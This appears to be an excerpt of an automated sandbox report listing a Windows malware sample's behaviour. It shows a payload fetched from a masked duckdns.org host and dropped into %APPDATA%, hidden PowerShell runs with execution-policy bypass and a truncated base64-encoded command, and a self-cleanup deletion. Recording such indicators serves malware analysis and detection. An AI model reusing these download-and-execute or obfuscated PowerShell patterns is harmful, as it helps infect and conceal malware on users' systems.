Technical Information
- http://dn####.duckdns.org/www.exe as %appdata%\networksystem64.exe
- %WINDIR%\syswow64\chkdsk.exe
- %APPDATA%\networksystem64.exe
- %APPDATA%\networksystem64.exe
- http://dn####.duckdns.org/www.exe
- DNS ASK dn####.duckdns.org
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%APPDATA%\networksystem64.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' POWeRSHeLL.ExE -ex ByPAss -Nop -w 1 -eC KAAJACAACQAJAAkAIAAJACAACQAmACgAJwBOAGUAVwAtAG8AYgAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' POWeRSHeLL.ExE -ex ByPAss -Nop -w 1 -eC KAAJACAACQAJAAkAIAAJACAACQAmACgAJwBOAGUAVwAtAG8AYgAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA...
- '%WINDIR%\syswow64\chkdsk.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%APPDATA%\networksystem64.exe"